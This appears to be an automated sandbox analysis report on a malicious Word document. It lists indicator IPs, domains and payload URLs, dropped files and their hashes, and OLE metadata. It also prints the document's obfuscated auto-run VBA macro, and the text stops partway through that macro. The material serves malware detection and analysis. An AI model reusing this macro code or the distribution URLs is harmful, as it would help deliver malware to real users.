195.159.28.230 | WWB4766-012021-4480624.doc | malicious | 195.159.28.230:8080/orsnig0hr2s74h42s/s6f5l/8oomdsfuyoft/ut3wi8ze1lmdcgp5d/zu7j1c9ns/otptuv61n2r997toe/
195.159.28.230 | file.doc | malicious | 195.159.28.230:8080/3j8r06xre/8aflom7at/nfsdzovs6zi5xy894/pzjbw/
195.159.28.230 | Dokumentation_2021_M_428406.doc | malicious | 195.159.28.230:8080/n0jv/20kkdc3lp37n1r7yr9l/7fl0uh0jxz/
162.241.224.176 | INFO.doc | malicious | -
45.143.97.183 | INFO.doc | malicious | armakonarms.com/wp-includes/fz/
69.38.130.14 | INFO.doc | malicious | -
69.38.130.14 | DOK-012021.doc | malicious | -
69.38.130.14 | DKMNT.doc | malicious | -
69.38.130.14 | WWB4766-012021-4480624.doc | malicious | -
69.38.130.14 | file.doc | malicious | -
69.38.130.14 | Dokumentation_2021_M_428406.doc | malicious | -
166.62.10.32 | INFO.doc | malicious | silkonbusiness.matrixinfotechsolution.com/js/q26/
166.62.10.32 | MES-2021_01_22-3943960.doc | malicious | zippywaytest.toppermaterial.com/wp-admin/wwbJ/
166.62.10.32 | Documento 2201 01279.doc | malicious | zippywaytest.toppermaterial.com/wp-admin/wwbJ/

                                                                    Domains

Match / Associated Sample Name (Detection) / Context

Match: armakonarms.com
  INFO.doc (malicious)
    • 45.143.97.183
Match: silkonbusiness.matrixinfotechsolution.com
  INFO.doc (malicious)
    • 166.62.10.32
Match: coworkingplus.es
  INFO.doc (malicious)
    • 172.67.138.213
Match: bbjugueteria.com
  INFO.doc (malicious)
    • 162.241.60.240

                                                                    ASN

Match / Associated Sample Name (Detection) / Context

Match: UNIFIEDLAYER-AS-1US
  INFO.doc (malicious)
    • 162.241.224.176
  Electronic form.doc (malicious)
    • 192.232.250.227
  file.doc (malicious)
    • 162.241.253.129
  Payment_[Ref 72630 - joe.blow].html (malicious)
    • 50.87.150.0
  Payment _Arabian Parts Co BSC#U00a9.exe (malicious)
    • 74.220.199.6
  request_form_1611306935.xlsm (malicious)
    • 162.241.225.18
  file-2021-7_86628.doc (malicious)
    • 162.241.253.129
  SecuriteInfo.com.Trojan.Dridex.735.31734.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.12612.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.4639.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.24961.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.6647.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.4309.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.30163.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.17436.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.15942.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.27526.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.71.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.23113.dll (malicious)
    • 198.57.200.100
  SecuriteInfo.com.Trojan.Dridex.735.32551.dll (malicious)
    • 198.57.200.100
Match: ASN-CATCHCOMNO
  INFO.doc (malicious)
    • 195.159.28.230
  DKMNT.doc (malicious)
    • 195.159.28.230
  WWB4766-012021-4480624.doc (malicious)
    • 195.159.28.230
  file.doc (malicious)
    • 195.159.28.230
  Dokumentation_2021_M_428406.doc (malicious)
    • 195.159.28.230
  mssecsvr.exe (malicious)
    • 159.163.124.251
  windows.staterepositoryupgrade.exe (malicious)
    • 195.159.28.244
  Check.vbs (malicious)
    • 64.28.27.61
  HKHX38WttZ.exe (malicious)
    • 195.159.28.230
  SecuriteInfo.com.Trojan.GenericKD.35280757.18070.dll (malicious)
    • 193.90.12.121
  Information-822908953.doc (malicious)
    • 193.90.12.121
  ef5ai1p.dll (malicious)
    • 193.90.12.121
  Documentation.478396766.doc (malicious)
    • 193.90.12.121
  Information-478224510.doc (malicious)
    • 193.90.12.121
  7aKeSIV5Cu.dll (malicious)
    • 193.90.12.121
  qRMGCk1u96.dll (malicious)
    • 193.90.12.121
  dVcML4Zl0J.dll (malicious)
    • 193.90.12.121
  JTWtIx6ADf.dll (malicious)
    • 193.90.12.121
  yrV5qWOmi3.dll (malicious)
    • 193.90.12.121
  Invoice_99012_476904.xlsm (malicious)
    • 193.90.12.121

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E909297-30AB-4901-9D2A-3CE504568F55}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE4101D0-AA40-4E61-A4A8-E94B34BC975F}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.354223167367391
Encrypted: false
SSDEEP: 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzh
MD5: 5C1841D0F35E50949B90B42CF085C0A1
SHA1: 04CFDA027BAD492E3DBF78342F6056AB489B91E1
SHA-256: 01E73BFFFED6CB9653627CC7B7C29A2A18CABD3853BFC28977DC7C33629C85DC
SHA-512: 8911BA94418A90870AAE32DC362BC837BB9522A97151DEEEB6FCB6C71351FA1AF86769D7C6E4801A872630AB40509C2234B46FAB722E791A31FF621EDB7698EF
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\79a2gzs3gkk.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Mon Jan 25 01:03:33 2021, length=178176, window=hide
Category: dropped
Size (bytes): 2038
Entropy (8bit): 4.523237238378091
Encrypted: false
SSDEEP: 48:8Ck/XT3InBq/Nygz4Qh2Ck/XT3InBq/Nygz4Q/:8Ck/XLInB4z4Qh2Ck/XLInB4z4Q/
MD5: B43DCEAE9E64A3AC5207B6182FEE8C3D
SHA1: F89DF29AC71FE19F6809C533DF684D8D3F75F77C
SHA-256: F348E390165667E03E79C9F0758988CD725A0E5FC2CA9E717325388BB7598896
SHA-512: 668CBC5CE71CF11F10FCD96E4C4A7520AC09366C889065AA3EDF1590A8CCF979E151ABEAE2567C4A28A69C1362F0CB8AD7AE4A83C124414E16A5C9C3434447D8
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 71
Entropy (8bit): 4.374361647875772
Encrypted: false
SSDEEP: 3:M1Sc+3Lp5oknLp5omX1Sc+3Lp5ov:MYd3LjvLjad3Ljy
MD5: E20D3E64DBBC9A3366747302AE395C52
SHA1: 6898B56131A6394B30DFE77243CDC95AE782B8FC
SHA-256: 05306690592B95A4CA2A107531C69B067E3317B4EF4BF0EB613DF56A3E962343
SHA-512: 6071D6C574C087664BCC69D39F33814872109540D1BD4DE534E76B8315ACE1C0B32FE005D8C2873FA36EE7A8EECD8526A76F8FBBB13AE2FEBBFD35B7A00992F0
Malicious: false
Preview: [doc]..79a2gzs3gkk.LNK=0..79a2gzs3gkk.LNK=0..[doc]..79a2gzs3gkk.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.431160061181642
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5: 39EB3053A717C25AF84D576F6B2EBDD2
SHA1: F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512: 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSXIKQWUQAVGAKAOHWPT.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.583148193596563
Encrypted: false
SSDEEP: 96:chQCsMqUqvsqvJCwoR4z8hQCsMqUqvsEHyqvJCworT4zkCYxHG4f8R/lUVP4Iu:cydoR4z8yFHnorT4zkm4f8Rg4Iu
MD5: 3FB26C642415D765F04BB677B376E3AA
SHA1: E320E3D95192AAAF52B5517CE6A5C0B5F245D92E
SHA-256: 0990DD41DC52D5E61D8D8831C9887FAF976D90D9BE60CEC034715693412DFF3C
SHA-512: 5FF76DAF598B3BCDD36FE0833811C176D2145C4801417915E26F848401916A29D9EA03C0F9B7E385805AF5B24B479F50ED0DAA356506E0949739D3A2560D4AB6
Malicious: false
C:\Users\user\Desktop\~$a2gzs3gkk.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.431160061181642
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5: 39EB3053A717C25AF84D576F6B2EBDD2
SHA1: F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512: 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious: false
C:\Users\user\Snuvw2w\V4651pz\H64C.dll
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 352816
Entropy (8bit): 4.350871771424849
Encrypted: false
SSDEEP: 3072:CZvA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:CZ206xWgGxLxWN40PDKR/JnX2P
MD5: E147068A449E684FE47A1220F167F61F
SHA1: A434144E723E2FC6BED01F891172D476DC2DB1E1
SHA-256: 917620A42745392EA46380F0C1E22CF8F314040CFD528FF7AAD7FE191991BA3B
SHA-512: 4B3E1DEBCE8D57B1FFEE7A645265D8BA4E95F4B9213F7F12C8AD37D3F34A01C43C868F64DD0DD5A7AE341ACF57D5AFC69B898C433E001D16B028361E4656DACA
Malicious: true
                                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                                    Static File Info

                                                                    General

                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm, Author: Elisa Cisneros, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 12:16:00 2021, Last Saved Time/Date: Fri Jan 22 12:16:00 2021, Number of Pages: 1, Number of Words: 4060, Number of Characters: 23145, Security: 8
                                                                    Entropy (8bit):6.70817011278778
                                                                    TrID:
                                                                    • Microsoft Word document (32009/1) 79.99%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                                                    File name:79a2gzs3gkk.doc
                                                                    File size:177664
                                                                    MD5:09a4d7bbb0db4003f6d6eee258f0ae48
                                                                    SHA1:b611b372dc40c114d2fb52cf967ffb9062728372
                                                                    SHA256:df5ff0dd34808825942b6b896c5129f63bc36f8fbbba7f3ce145cced467c662a
                                                                    SHA512:e46061512eb44985dd51a78274709d03c937212272cea2ad7752d686ef89fa9a866744bc735ec5e8346ab73e90764276829de8a26ab7eb1ca5ef68fa72e29ab8
                                                                    SSDEEP:3072:YwT4OUNzBgQEPcnc2kTdcrrXyQBsc0vWJVi4IrwVEYbdYPeFmfG5/+vGsPt4kohL:YwT4OUNzBgQEPcnc2tPII2k
                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                    File Icon

                                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                                    Static OLE Info

                                                                    General

                                                                    Document Type:OLE
                                                                    Number of OLE Files:1

                                                                    OLE File "79a2gzs3gkk.doc"

                                                                    Indicators

                                                                    Has Summary Info:True
                                                                    Application Name:Microsoft Office Word
                                                                    Encrypted Document:False
                                                                    Contains Word Document Stream:True
                                                                    Contains Workbook/Book Stream:False
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:
                                                                    Flash Objects Count:
                                                                    Contains VBA Macros:True

                                                                    Summary

                                                                    Code Page:1252
                                                                    Title:
                                                                    Subject:Central ROI payment Planner Money Market Account azure Metal value-added Latvia next-generation algorithm
                                                                    Author:Elisa Cisneros
                                                                    Keywords:
                                                                    Comments:
                                                                    Template:Normal.dotm
                                                                    Last Saved By:
                                                                    Revision Number:1
                                                                    Total Edit Time:0
                                                                    Create Time:2021-01-22 12:16:00
                                                                    Last Saved Time:2021-01-22 12:16:00
                                                                    Number of Pages:1
                                                                    Number of Words:4060
                                                                    Number of Characters:23145
                                                                    Creating Application:Microsoft Office Word
                                                                    Security:8

                                                                    Document Summary

                                                                    Document Code Page:-535
                                                                    Number of Lines:192
                                                                    Number of Paragraphs:54
                                                                    Thumbnail Scaling Desired:False
                                                                    Company:
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:917504

                                                                    Streams with VBA

                                                                    VBA File Name: Tvh1u8793dltn9, Stream Size: 1109
                                                                    General
                                                                    Stream Path:Macros/VBA/Tvh1u8793dltn9
                                                                    VBA File Name:Tvh1u8793dltn9
                                                                    Stream Size:1109
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . { . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 7b 84 8f 58 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Document_open()
                                                                    VB_Creatable
                                                                    False
                                                                    Private
                                                                    VB_Exposed
                                                                    Attribute
                                                                    VB_Name
                                                                    VB_PredeclaredId
                                                                    VB_GlobalNameSpace
                                                                    VB_Base
                                                                    VB_Customizable
                                                                    VB_TemplateDerived
                                                                    VBA Code
                                                                    Attribute VB_Name = "Tvh1u8793dltn9"
                                                                    Attribute VB_Base = "1Normal.ThisDocument"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = True
                                                                    Attribute VB_Customizable = True
                                                                    Private Sub Document_open()
                                                                    Cfqzsexf2_k
                                                                    End Sub
                                                                    VBA File Name: Twh1gb2mpd3, Stream Size: 697
                                                                    General
                                                                    Stream Path:Macros/VBA/Twh1gb2mpd3
                                                                    VBA File Name:Twh1gb2mpd3
                                                                    Stream Size:697
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . { . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 7b 84 c2 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    Attribute
                                                                    VB_Name
                                                                    VBA Code
                                                                    Attribute VB_Name = "Twh1gb2mpd3"
                                                                    VBA File Name: X1bqz0qaer43b52bf, Stream Size: 25057
                                                                    General
                                                                    Stream Path:Macros/VBA/X1bqz0qaer43b52bf
                                                                    VBA File Name:X1bqz0qaer43b52bf
                                                                    Stream Size:25057
                                                                    Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 7b 84 d9 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                    VBA Code Keywords

                                                                    Keyword
                                                                    fUGOALvdN,
                                                                    KgsfYDHSH
                                                                    OlVYDaAK.Range
                                                                    iVxnxGH()
                                                                    TMQhTRa,
                                                                    Until
                                                                    lMxOJUo
                                                                    htkDBkB,
                                                                    hbrLsIIaJ
                                                                    lTApi,
                                                                    WhmkB
                                                                    JRtnBYH
                                                                    KAIEzBBDB:
                                                                    axfnb
                                                                    ZFzwZcA
                                                                    OGmjSHH,
                                                                    DOUPnxsoh
                                                                    TQOflAN:
                                                                    bkUZDN
                                                                    UmQHurWB
                                                                    JltZHC
                                                                    pXPTCf(jHDSG)
                                                                    QNtsSHe()
                                                                    rZGGJBDEH
                                                                    EvkuEA
                                                                    xhcZSBIH
                                                                    imnrzOF
                                                                    (LZepVwu
                                                                    LfOAoxD,
                                                                    lTApi
                                                                    wrpigDnBA
                                                                    (lqbmGD
                                                                    wVEbaDF
                                                                    OGmjSHH
                                                                    udnviH
                                                                    njcnja
                                                                    NreFC:
                                                                    (ofBYJAJ
                                                                    ZlnBbxF.Range
                                                                    GXzgs
                                                                    bquxP
                                                                    rVJUDUKH
                                                                    KwsnJ
                                                                    (TMQhTRa
                                                                    FcotIf()
                                                                    QtjyA:
                                                                    opZGEJ
                                                                    urNCUFJBF:
                                                                    iqpwDAG
                                                                    sJtmJ
                                                                    (yNTJYEFj
                                                                    BMzteJlIE(ccUPI)
                                                                    BMzteJlIE
                                                                    FVoXJ
                                                                    UZSgXY,
                                                                    NDNfzBJJ
                                                                    wEvDIdG
                                                                    MidB$(pXPTCf,
                                                                    MidB$(zxBvQRHoF,
                                                                    TtNYEBE
                                                                    zxEzinCG
                                                                    YvQjieFc.Range
                                                                    XdfYSIXX.Range
                                                                    HoDns
                                                                    arTLjQ
                                                                    (UZSgXY
                                                                    wzAgBA
                                                                    pXRdBD()
                                                                    pzxJi
                                                                    pXPTCf()
                                                                    pxjzGA
                                                                    DLNPo(zZJyEAC)
                                                                    MidB$(bKloWCbL,
                                                                    IFmVwCk
                                                                    NelhA
                                                                    QtjyA
                                                                    pxjzGA(FKISJTLG)
                                                                    aekya
                                                                    KGTisCFg
                                                                    UBound(pXRdBD)
                                                                    yEbqhrSDE
                                                                    QNtsSHe
                                                                    EHISACDA
                                                                    pXRdBD(bDqBloVC)
                                                                    cXPNdFE()
                                                                    IeEnJ
                                                                    FcotIf
                                                                    hVgaFGj
                                                                    DLNPo
                                                                    jpCcJn()
                                                                    KAIEzBBDB
                                                                    zZJyEAC,
                                                                    cwrlb
                                                                    ooYfBGDHB
                                                                    swiEYEUA
                                                                    PRawGB
                                                                    mDUMGI
                                                                    wjnsc
                                                                    pblpJEP,
                                                                    fNBrHlEAv:
                                                                    boTEsG,
                                                                    YXZHHCaB(htkDBkB)
                                                                    QyRiIm,
                                                                    BMfqCFLcE
                                                                    tmhzE
                                                                    nnjasd,
                                                                    UBound(bIdgDIKT)
                                                                    Resume
                                                                    (lTApi
                                                                    TIdZDCk.Range
                                                                    SWSoCG:
                                                                    prgAO
                                                                    UBound(FcotIf)
                                                                    DLwSlnDF
                                                                    OfcyMA
                                                                    XxLEEC:
                                                                    IFdNKp,
                                                                    wqMdGGa()
                                                                    EFfaBWHC
                                                                    ZFzwZcA()
                                                                    (bDqBloVC
                                                                    bZSWsqlD.Range
                                                                    WEIxlI
                                                                    UBound(wqMdGGa)
                                                                    (OGmjSHH
                                                                    MidB$(wWvlxHJH,
                                                                    IFdNKp
                                                                    cxvFCyK
                                                                    MxAtNhGI
                                                                    AOSGE
                                                                    (nHiSH
                                                                    LVHhGsGJd
                                                                    ZGOfHDFZ
                                                                    wqMdGGa(ZXUkHUDE)
                                                                    BhNEmrIE:
                                                                    MidB$(YXZHHCaB,
                                                                    wFpBJBJE.Range
                                                                    fPJtR
                                                                    pblpJEP
                                                                    ScLedvBEA
                                                                    JPHDBd
                                                                    VwecCsW
                                                                    tVHJH.Range
                                                                    wWvlxHJH
                                                                    OlVYDaAK
                                                                    nHiSH,
                                                                    ooYfBGDHB.Range
                                                                    (iqpwDAG
                                                                    (mDUMGI
                                                                    JJlPCJ
                                                                    bkUZDN.Range
                                                                    NreFC
                                                                    jHDSG,
                                                                    UBound(bKloWCbL)
                                                                    yJRyW
                                                                    VwecCsW.Range
                                                                    pXPTCf
                                                                    nfGGCgIdG
                                                                    bKloWCbL()
                                                                    mDUMGI,
                                                                    qZUuB()
                                                                    (EHISACDA
                                                                    cXPNdFE
                                                                    (htkDBkB
                                                                    DwikAuvE,
                                                                    MidB$(VuThCQHH,
                                                                    iVxnxGH(yNTJYEFj)
                                                                    cXPNdFE(IFdNKp)
                                                                    EHISACDA,
                                                                    FSWADGB
                                                                    UBound(jpCcJn)
                                                                    jHDSG
                                                                    obcJwDFA
                                                                    (wJpzu
                                                                    VBA Code
                                                                    Attribute VB_Name = "X1bqz0qaer43b52bf"
                                                                    Function Cfqzsexf2_k()
                                                                       GoTo duvyGCCDG
                                                                    Set IacBICp = IFmVwCk
                                                                        Dim wzeYO, ZXUkHUDE, dWLbDBA As Long
                                                                        Dim bZSWsqlD As Word.Paragraph
                                                                        Dim wqMdGGa() As Byte
                                                                        For Each bZSWsqlD In Tvh1u8793dltn9.Paragraphs
                                                                            wqMdGGa = bZSWsqlD.Range
                                                                            dscc = "sadsaccc" & bZSWsqlD.Range
                                                                            ZXUkHUDE = UBound(wqMdGGa) - 1
                                                                            wzeYO = 0
                                                                    Set oTxSFKM = PwelHHe
                                                                            Do Until ZXUkHUDE > ZXUkHUDE
                                                                                If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then
                                                                                    dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3)
                                                                                    wzeYO = ZXUkHUDE + 2
                                                                                End If
                                                                                ZXUkHUDE = ZXUkHUDE + 2
                                                                            Loop
                                                                        Next
                                                                    duvyGCCDG:
                                                                    skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9 . Content + P74x_w06z8wy
                                                                       GoTo NreFC
                                                                    Set zkqnNAIz = DOUPnxsoh
                                                                        Dim ofBYJAJ, LfOAoxD, gNcNXLsAj As Long
                                                                        Dim BMfqCFLcE As Word.Paragraph
                                                                        Dim zxBvQRHoF() As Byte
                                                                        For Each BMfqCFLcE In Tvh1u8793dltn9.Paragraphs
                                                                            zxBvQRHoF = BMfqCFLcE.Range
                                                                            dscc = "sadsaccc" & BMfqCFLcE.Range
                                                                            LfOAoxD = UBound(zxBvQRHoF) - 1
                                                                            ofBYJAJ = 0
                                                                    Set GXzgs = tmhzE
                                                                            Do Until LfOAoxD > LfOAoxD
                                                                                If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then
                                                                                    dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)
                                                                                    ofBYJAJ = LfOAoxD + 2
                                                                                End If
                                                                                LfOAoxD = LfOAoxD + 2
                                                                            Loop
                                                                        Next
                                                                    NreFC:
                                                                    wjnsc = "x [ sh bpx [ sh b"
                                                                    T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
                                                                       GoTo fNBrHlEAv
                                                                    Set JJlPCJ = obTyv
                                                                        Dim wJpzu, IFdNKp, KgsfYDHSH As Long
                                                                        Dim rVJUDUKH As Word.Paragraph
                                                                        Dim cXPNdFE() As Byte
                                                                        For Each rVJUDUKH In Tvh1u8793dltn9.Paragraphs
                                                                            cXPNdFE = rVJUDUKH.Range
                                                                            dscc = "sadsaccc" & rVJUDUKH.Range
                                                                            IFdNKp = UBound(cXPNdFE) - 1
                                                                            wJpzu = 0
                                                                    Set XHCLGl = JoHgzC
                                                                            Do Until IFdNKp > IFdNKp
                                                                                If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then
                                                                                    dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)
                                                                                    wJpzu = IFdNKp + 2
                                                                                End If
                                                                                IFdNKp = IFdNKp + 2
                                                                            Loop
                                                                        Next
                                                                    fNBrHlEAv:
                                                                    Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
                                                                       GoTo KAIEzBBDB
                                                                    Set lMxOJUo = BYQeC
                                                                        Dim mDUMGI, KwsnJ, cwrlb As Long
                                                                        Dim PlllYA As Word.Paragraph
                                                                        Dim bIdgDIKT() As Byte
                                                                        For Each PlllYA In Tvh1u8793dltn9.Paragraphs
                                                                            bIdgDIKT = PlllYA.Range
                                                                            dscc = "sadsaccc" & PlllYA.Range
                                                                            KwsnJ = UBound(bIdgDIKT) - 1
                                                                            mDUMGI = 0
                                                                    Set OELBME = PpRoB
                                                                            Do Until KwsnJ > KwsnJ
